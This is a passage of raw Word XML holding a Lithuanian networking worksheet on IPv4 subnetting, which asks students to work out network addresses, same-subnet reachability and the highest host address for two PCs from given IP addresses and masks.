          <w:trHeight w:val="382"/>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A71AA59"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Network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5A0F3BE"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AB3B0F0"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bl>
    <w:p w14:paraId="7F0AEAB7" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60DB635E" w14:textId="538DE9BF" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C"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1</w:t>
      </w:r>
      <w:r w:rsidR="00683BC8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>IPV4 ADRESŲ SKAIČIAVIMAS</w:t>
      </w:r>
      <w:r w:rsidR="003B60A5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7FF4C6" w14:textId="68F34A6E" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">UŽDUOTIES SĄLYGA: </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Apskaičiuo</w:t>
      </w:r>
      <w:r w:rsidR="00915591" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tinklo IP adresą pagal duotas situacijas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DE31C9" w14:textId="1014A038" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nustatykite tinklo IP adresus pagal</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00915591" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">lentelėje pateiktas </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sąlygas:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpXSpec="right" w:tblpY="135"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5098"/>
        <w:gridCol w:w="4813"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="29830BDA" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2528CE67" w14:textId="57155FA2" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00915591" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Jūs </w:t>
            </w:r>
            <w:r w:rsidR="0045669E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>konfigūruojate</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>du kompiuterius savo tinkle. PC-A</w:t>
            </w:r>
            <w:r w:rsidR="003B60A5" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">kuriam </w:t>
            </w:r>
            <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>suteikiate IP adresą 192.168.1.18</w:t>
            </w:r>
            <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ir PC-B</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>, kuriam</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>suteikiate IP adresą 192.168.1.33. Ab</w:t>
            </w:r>
            <w:r w:rsidR="0045669E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>iejų</w:t>
            </w:r>
            <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> kompiuteri</w:t>
            </w:r>
            <w:r w:rsidR="0045669E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ų</w:t>
            </w:r>
            <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> tinklo kaukę </w:t>
            </w:r>
            <w:r w:rsidR="0045669E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">yra </w:t>
            </w:r>
            <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>255.255.255.240.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="1B594360" w14:textId="77777777" w:rsidTr="00915591">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2572" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="236A7A25" w14:textId="40DB5BB6" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Kok</w:t>
            </w:r>
            <w:r w:rsidR="00915591" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>į</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> tinklo adres</w:t>
            </w:r>
            <w:r w:rsidR="00915591" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ą priskiriate</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> kompiuteriui PC-A?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2428" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="46DCB003" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="12524DB1" w14:textId="77777777" w:rsidTr="00915591">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2572" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4A7A7D03" w14:textId="79C2B556" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Kok</w:t>
            </w:r>
            <w:r w:rsidR="00915591" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>į</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> tinklo adres</w:t>
            </w:r>
            <w:r w:rsidR="00915591" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ą nustatote</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>kompiuteriui PC-B?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2428" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="581AAC56" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="01A9E8C6" w14:textId="77777777" w:rsidTr="00915591">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2572" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7A7B28BC" w14:textId="2F50FFD1" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00915591" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Kokiame tinkle yra abu</w:t>
            </w:r>
            <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> kompiuteriai</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>? Ar</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">gali vienas su kitu komunikuoti tiesiogiai? </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Pakomentuokite k</w:t>
            </w:r>
            <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>odėl?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2428" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="61D69F4B" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="5F6F2162" w14:textId="77777777" w:rsidTr="00915591">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2572" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6E53B650" w14:textId="414A5D34"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Koks </w:t>
            </w:r>
            <w:r w:rsidR="008F5DB6" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">didžiausias </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>IP adresas gali būti suteiktas PC-B, kad jis būtų tame pačiame tinkle</w:t>
            </w:r>
            <w:r w:rsidR="00915591" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>kaip ir PC-A?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2428" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1C8618B9" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46852D60" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="00924E65" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27A45A17" w14:textId="5050CAE9" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nustatykite tinklo IP adresus pagal sąlygas:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5098"/>
        <w:gridCol w:w="4813"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="738EA655" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="6720E218" w14:textId="310DA803" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00915591" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Jūs k</w:t>
            </w:r>
            <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>onfigūruojate du kompiuterius savo tinkle. PC-A</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>, kuriam</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>suteikiate IP adresą 10.0.0.16, ir PC-B</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>, kuriam</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">suteikiate IP adresą 10.1.14.68. </w:t>
            </w:r>
            <w:r w:rsidR="006C13C8" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Abiejų kompiuterių tinklo kaukę yra </w:t>
            </w:r>
            <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>255.254.0.0.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="723437E2" w14:textId="77777777" w:rsidTr="00332B40">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2572" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="428FEF22" w14:textId="73F3390D" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Kok</w:t>
            </w:r>
            <w:r w:rsidR="00915591" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>į tinklo</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> adres</w:t>
            </w:r>
            <w:r w:rsidR="00915591" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ą priskiriate</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> kompiuteriui PC-A?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2428" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="26D5C6B1" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="3264B5F4" w14:textId="77777777" w:rsidTr="00332B40">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2572" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
